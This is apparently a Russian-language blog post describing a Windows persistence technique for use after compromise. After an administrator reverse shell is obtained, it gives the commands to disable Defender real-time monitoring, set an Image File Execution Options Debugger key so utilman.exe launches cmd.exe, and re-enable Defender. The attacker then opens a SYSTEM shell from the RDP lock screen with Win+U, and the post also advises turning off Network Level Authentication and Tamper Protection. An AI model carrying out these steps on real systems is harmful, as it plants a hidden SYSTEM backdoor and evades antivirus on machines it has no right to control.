Как стать автором
Обновить

Persistence via RDP

Время на прочтение3 мин
Количество просмотров5.4K

Внимание! Статья несёт исключительно информативный характер. Подобные действия преследуются по закону!

Привет! Сегодня хотелось бы рассмотреть стандартный, но необычный способ закрепления в системе через RDP, используя utilman.exe.

Представим следующую ситуацию: нам удалось получить reverse shell от целевого хоста. Безусловно, нам необходим backdoor для обеспечения постоянного доступа. В процессе сканирования мы узнаем об открытом 3389 порте. И как нам быть?

Немного теории

RDP (Remote Desktop Protocol) — это протокол для удаленного подключения к компьютеру или серверу с ОС Windows. С его помощью пользователи могут подключиться к удаленной машине и взаимодействовать с ее рабочим столом так, как если бы они физически находились перед ней. Чаще всего служба RDP используется для администрирования серверов, технической поддержки пользователей и удаленной работы.

Utilman.exe — это служебная программа Windows, которая служит для запуска специальных возможностей на экране блокировки (экранный диктор, экранная клавиатура, лупа и т. п.).

Реестр Windows - иерархически построенная база данных параметров и настроек в большинстве операционных систем Microsoft Windows. Реестр содержит информацию и настройки для аппаратного обеспечения, программного обеспечения, профилей пользователей, предустановки.

Информация о жертве

Сразу хотелось бы отметить, что целевой хост имеет следующую ОС:

Ключевой особенностью систем Windows Server является отключенное по умолчанию свойство "Tamper Protection", которое обеспечивает дополнительную защиту от изменений ключевых функций безопасности, включая ограничение изменений, которые не вносятся непосредственно через приложение. Другими словами, запрещает другим вмешиваться в важные функции безопасности системы (запрещает изменение реестра).

Если данная функция включена, то отключить ее можно разными методами, например: https://theitbros.com/managing-windows-defender-using-powershell/#:~:text=Tamper%20Protection%20is%20enabled%20in,action%20at%20the%20UAC%20prompt

Также обязательным условием является выключенный параметр "Require computers to use Network Level Authentication to connect", который запрещает подключаться по RDP без конкретной УЗ. Иными словами, запрет на попадание на экран блокировки

Отключение функции "Require computers to use Network Level Authentication to connect".

Практический пример

Допустим, мы каким-то чудом смоги получить обратную оболочку от имени Администратора хоста:

Давайте проверим состояние активности антивируса (общий способ):

sc query WinDefend

Мы видим параметр "NOT_STOPABLE", который говорит нам о том, что защита в реальном времени активна. Выключаем её:

powershell -command "Set-MpPreference -DisableRealtimeMonitoring $true"

и опять проверим состояние антивируса:

Также можно проверить другим способом:

powershell -command "(Get-MpPreference).DisableRealtimeMonitoring"

Если эта команда возвращает значение False, то реальный мониторинг активен. Если True, то выключен.

Действительно, он выключен. Теперь, когда приготовления закончены, перейдем к закреплению:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

Следующий шаг несет в себе возможную потерю backdoor'a.

Теперь вернем Defender в исходное состояние:

powershell -command "Set-MpPreference -DisableRealtimeMonitoring $false"

и сразу проверим:

powershell -command "(Get-MpPreference).DisableRealtimeMonitoring"

Прекращаем взаимодействие с хостом через обратную оболочку и подключаемся через rdesktop:
rdesktop ip

При первом подключении принимаем сертификаты

Теперь нам осталось нажать на значок справа внизу или комбинацию клавиш Win+U:

Успех! Теперь у нас есть backdoor от имени системы.

Кстати, вы заметили, что мы повысили свои права от Администратора до системы?)

Но почему это так работает?

Если кратко, то некоторые сервисы, службы и т.д. работают в системе с наивысшими правами. В нашем случае, utilman.exe. Изменив в реестре исполняемый файл на cmd.exe, система запускает его, опять же, с наивысшими правами (nt authority\ system)

Видео демонстрация атаки

https://www.youtube.com/watch?v=WZZT1F6lTww

Теги:
Хабы:
Всего голосов 7: ↑4 и ↓3+1
Комментарии6

Публикации

Истории

Ближайшие события

One day offer от ВСК
Дата16 – 17 мая
Время09:00 – 18:00
Место
Онлайн
Конференция «Я.Железо»
Дата18 мая
Время14:00 – 23:59
Место
МоскваОнлайн
Антиконференция X5 Future Night
Дата30 мая
Время11:00 – 23:00
Место
Онлайн
Конференция «IT IS CONF 2024»
Дата20 июня
Время09:00 – 19:00
Место
Екатеринбург
Summer Merge
Дата28 – 30 июня
Время11:00
Место
Ульяновская область